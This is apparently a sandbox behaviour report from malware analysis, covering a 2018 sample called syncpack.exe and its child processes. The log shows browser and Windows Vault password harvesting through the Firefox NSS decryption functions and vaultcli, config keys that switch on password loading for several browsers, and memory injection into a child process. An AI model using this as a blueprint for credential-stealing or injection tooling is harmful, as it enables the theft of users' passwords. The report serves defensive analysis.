Open c:\program files (x86)\adobe\theta islands installed.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\sdclt.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\dvd maker\kennedy_analysis_graduate_livestock.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\conhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\uninstall information\all.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\reference assemblies\filled_throat_champions.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows nt\midnight-consulting-maintenance.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\mozilla firefox\ethnic.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\microsoft.net\pleasure eventually spy reasonable.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows nt\jeanelectricaldevelopmentteens.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows nt\ireland.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\microsoft visual studio\question apple.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows nt\cache_mitchell.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\microsoft.net\html contract.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\splwow64.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\sppsvc.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\wbem\wmiprvse.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\wbem\wmiadap.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\wbem\wmiprvse.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\programdata\surtq5qk9h.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\programdata\oyvgkgw.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\syswow64\cmd.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\conhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\syswow64\windowspowershell\v1.0\powershell.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Module (69)
»
Operation Module Additional Information Success Count Logfile
Load comctl32.dll base_address = 0x75020000 True 1
Fn
Load shell32.dll base_address = 0x76480000 True 1
Fn
Load pstorec.dll base_address = 0x6fe60000 True 1
Fn
Load vaultcli.dll base_address = 0x70180000 True 1
Fn
Load C:\Program Files (x86)\Mozilla Firefox\nss3.dll base_address = 0x6ffc0000 True 1
Fn
Get Handle private_0x0000000000400000 base_address = 0x400000 True 22
Fn
Get Handle C:\Program Files (x86)\Mozilla Firefox\nss3.dll base_address = 0x0 False 1
Fn
Get Handle c:\program files (x86)\mozilla firefox\nss3.dll base_address = 0x6ffc0000 True 2
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75fb0000 True 2
Fn
Get Filename - process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 2
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll function = InitCommonControlsEx, address_out = 0x75026be6 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderPathW, address_out = 0x764a0468 True 1
Fn
Get Address c:\windows\syswow64\pstorec.dll function = PStoreCreateInstance, address_out = 0x6fe6526c True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultOpenVault, address_out = 0x701826a9 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultCloseVault, address_out = 0x70182718 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultEnumerateItems, address_out = 0x70183099 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultFree, address_out = 0x70184321 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultGetInformation, address_out = 0x701824c0 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultGetItem, address_out = 0x70183242 True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = NSS_Init, address_out = 0x7007d70b True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = NSS_Shutdown, address_out = 0x7007d13c True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = PK11_GetInternalKeySlot, address_out = 0x70013c51 True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = PK11_FreeSlot, address_out = 0x70013333 True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = PK11_CheckUserPassword, address_out = 0x6fffcbc4 True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = PK11_Authenticate, address_out = 0x6fffd3ca True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = PK11SDR_Decrypt, address_out = 0x700100a7 True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_open, address_out = 0x70121ca0 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_prepare, address_out = 0x700ace70 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_step, address_out = 0x70115200 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_column_text, address_out = 0x700cd400 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_column_int, address_out = 0x700cd3a0 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_column_int64, address_out = 0x700cd3d0 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_finalize, address_out = 0x700f9f60 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_close, address_out = 0x700fbde0 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_exec, address_out = 0x700fa270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryFullProcessImageNameW, address_out = 0x75fd15f7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessTimes, address_out = 0x75fdd60f True 1
Fn
System (1)
»
Operation Additional Information Success Count Logfile
Get Info type = Operating System True 1
Fn
Ini (28)
»
Operation Filename Additional Information Success Count Logfile
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = ShowGridLines, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = SaveFilterIndex, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = ShowInfoTip, default_value = 1 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = MarkOddEvenRows, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = ShowTimeInGMT, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = LoadPasswordsIE, default_value = 1 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = LoadPasswordsFirefox, default_value = 1 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = LoadPasswordsChrome, default_value = 1 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = LoadPasswordsOpera, default_value = 1 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = LoadPasswordsSafari, default_value = 1 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = LoadPasswordsSeaMonkey, default_value = 1 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = LoadPasswordsYandex, default_value = 1 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = UseFirefoxProfileFolder, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = UseFirefoxInstallFolder, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = UseChromeProfileFolder, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = UseOperaPasswordFile, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = FirefoxProfileFolder False 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = FirefoxInstallFolder False 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = ChromeProfileFolder False 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = OperaPasswordFile False 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = SaveFileEncoeding, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = WinPos False 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = Columns False 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = Sort, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini section_name = Profile0, key_name = Path, data_out = Profiles/p7ap74gw.default True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini section_name = Profile0, key_name = IsRelative, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini section_name = Profile1, key_name = Path False 1
Fn
Read C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini section_name = Profile1, key_name = IsRelative, default_value = 0 True 1
Fn
Process #12: syncpack_.exe
46 0
»
Information Value
ID #12
File Name c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:23, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:45
OS Process Information
»
Information Value
PID 0x834
Parent PID 0xb70 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 8A8
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False -
private_0x0000000000050000 0x00050000 0x00050fff Private Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x0012ffff Private Memory Readable, Writable True False False -
locale.nls 0x00130000 0x00196fff Memory Mapped File Readable False False False -
private_0x00000000001c0000 0x001c0000 0x002bffff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x003bffff Private Memory Readable, Writable True False False -
private_0x00000000003c0000 0x003c0000 0x003cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x00557fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000560000 0x00560000 0x006e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000006f0000 0x006f0000 0x01aeffff Pagefile Backed Memory Readable True False False -
kernel32.dll 0x777e0000 0x778fefff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x77900000 0x779f9fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fffa000 0x7fffa000 0x7fffafff Private Memory Readable, Writable True False False -
syncpack_.exe 0xffab0000 0xffac5fff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000140000000 0x140000000 0x14001efff Private Memory Readable, Writable, Executable True False False -
kernelbase.dll 0x7fefda00000 0x7fefda6afff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7fefdd20000 0x7fefdd86fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7fefde80000 0x7fefdf1efff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7fefdf20000 0x7fefdf90fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7fefe040000 0x7fefe242fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7fefe4b0000 0x7fefe58afff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x7fefe9c0000 0x7feff747fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7feff750000 0x7feff76efff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x7feff770000 0x7feff838fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7feffa40000 0x7feffb6cfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x7feffb70000 0x7feffc78fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7feffcd0000 0x7feffcfdfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x7feffd00000 0x7feffd0dfff Memory Mapped File Readable, Writable, Executable False False False -
apisetschema.dll 0x7feffd20000 0x7feffd20fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False -
private_0x000007fffffd8000 0x7fffffd8000 0x7fffffd8fff Private Memory Readable, Writable True False False -
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory Readable, Writable True False False -
Injection Information
»
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c address = 0x140000000, size = 126976 True 1
Fn
Data
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c address = 0x7fffffd8010, size = 8 True 1
Fn
Data
Modify Control Flow #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c os_tid = 0x8a8, address = 0x0 True 1
Fn
Host Behavior
File (3)
»
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Registry (2)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook value_name = DLLPathEx, data = 67 True 1
Fn
Module (39)
»
Operation Module Additional Information Success Count Logfile
Load advapi32.dll base_address = 0x7fefe4b0000 True 1
Fn
Load ole32.dll base_address = 0x7fefe040000 True 1
Fn
Load C:\PROGRA~2\MICROS~1\Office12\OLMAPI32.DLL base_address = 0x0 False 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x777e0000 True 1
Fn
Get Handle mscoree.dll - False 1
Fn
Get Filename - process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FlsAlloc, address_out = 0x777f7190 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FlsFree, address_out = 0x777f15b0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FlsGetValue, address_out = 0x77803520 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FlsSetValue, address_out = 0x777fbd90 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x777f79b0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateEventExW, address_out = 0x7782c590 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateSemaphoreExW, address_out = 0x7782c4c0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x777e8050 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x777e8820 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadpoolTimer, address_out = 0x77a1b2f0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x77a0d8c0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x77a0d620 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateThreadpoolWait, address_out = 0x7782ba80 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadpoolWait, address_out = 0x77a1e170 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CloseThreadpoolWait, address_out = 0x77a0c540 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77a51f80 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x77acec60 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x77a50040 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x7782b820 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x77855ad0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\system32\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x7782c3d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CompareStringEx, address_out = 0x7782b980 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetDateFormatEx, address_out = 0x77870920 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetLocaleInfoEx, address_out = 0x777e3c10 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetTimeFormatEx, address_out = 0x7786d4e0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x7782b790 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsValidLocaleName, address_out = 0x7782b770 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = LCMapStringEx, address_out = 0x7782b710 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetTickCount64, address_out = 0x777e9450 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
System (1)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-06-25 14:54:25 (UTC) True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Process #13: surtq5qk9h.exe
2275 0
»
Information Value
ID #13
File Name c:\programdata\surtq5qk9h.exe
Command Line "C:\ProgramData\suRtQ5QK9h.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:32, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:36
OS Process Information
»
Information Value
PID 0x7b4
Parent PID 0xb70 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 588
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
locale.nls 0x000a0000 0x00106fff Memory Mapped File Readable False False False -
private_0x0000000000110000 0x00110000 0x0013ffff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x0011ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000120000 0x00120000 0x00126fff Pagefile Backed Memory Readable True False False -
private_0x0000000000130000 0x00130000 0x0013ffff Private Memory Readable, Writable True False False -
rsaenh.dll 0x00140000 0x0017bfff Memory Mapped File Readable False False False -
~df91d880e8a18f5eb9.tmp 0x00140000 0x001bffff Memory Mapped File Readable, Writable True True False
pagefile_0x00000000001c0000 0x001c0000 0x001c1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x001dffff Private Memory Readable, Writable True False False -
private_0x00000000001e0000 0x001e0000 0x0025ffff Private Memory Readable, Writable True False False -
private_0x0000000000260000 0x00260000 0x0026ffff Private Memory Readable, Writable True False False -
private_0x0000000000270000 0x00270000 0x00271fff Private Memory Readable, Writable True False False -
private_0x0000000000290000 0x00290000 0x0030ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000310000 0x00310000 0x003eefff Pagefile Backed Memory Readable True False False -
surtq5qk9h.exe 0x00400000 0x00451fff Memory Mapped File Readable, Writable, Executable True False False -
private_0x0000000000460000 0x00460000 0x0cabffff Private Memory Readable, Writable True False False -
pagefile_0x000000000cac0000 0x0cac0000 0x0cc47fff Pagefile Backed Memory Readable True False False -
private_0x000000000ccb0000 0x0ccb0000 0x0cdaffff Private Memory Readable, Writable True False False -
pagefile_0x000000000cdb0000 0x0cdb0000 0x0cf30fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000cf40000 0x0cf40000 0x0e33ffff Pagefile Backed Memory Readable True False False -
private_0x000000000e340000 0x0e340000 0x0e73ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x0e740000 0x0ea0efff Memory Mapped File Readable False False False -
private_0x000000000ea10000 0x0ea10000 0x0ebcffff Private Memory Readable, Writable True False False -
private_0x000000000ea10000 0x0ea10000 0x0eb7ffff Private Memory Readable, Writable True False False -
private_0x000000000ea10000 0x0ea10000 0x0eb2ffff Private Memory Readable, Writable True False False -
private_0x000000000eb40000 0x0eb40000 0x0eb7ffff Private Memory Readable, Writable True False False -
private_0x000000000eb90000 0x0eb90000 0x0ebcffff Private Memory Readable, Writable True False False -
private_0x000000000ebd0000 0x0ebd0000 0x0ed3ffff Private Memory Readable, Writable True False False -
private_0x000000000ebd0000 0x0ebd0000 0x0eccffff Private Memory Readable, Writable True False False -
private_0x000000000ed30000 0x0ed30000 0x0ed3ffff Private Memory Readable, Writable True False False -
pagefile_0x000000000ed40000 0x0ed40000 0x0f13ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000000000f140000 0x0f140000 0x0f532fff Pagefile Backed Memory Readable True False False -
staticcache.dat 0x0f540000 0x0fe6ffff Memory Mapped File Readable False False False -
private_0x000000000fe70000 0x0fe70000 0x1006ffff Private Memory Readable, Writable True False False -
asycfilt.dll 0x6fcd0000 0x6fce3fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
msvbvm60.dll 0x72940000 0x72a92fff Memory Mapped File Readable, Writable, Executable True False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x74ec0000 0x74ed2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
sxs.dll 0x752d0000 0x7532efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
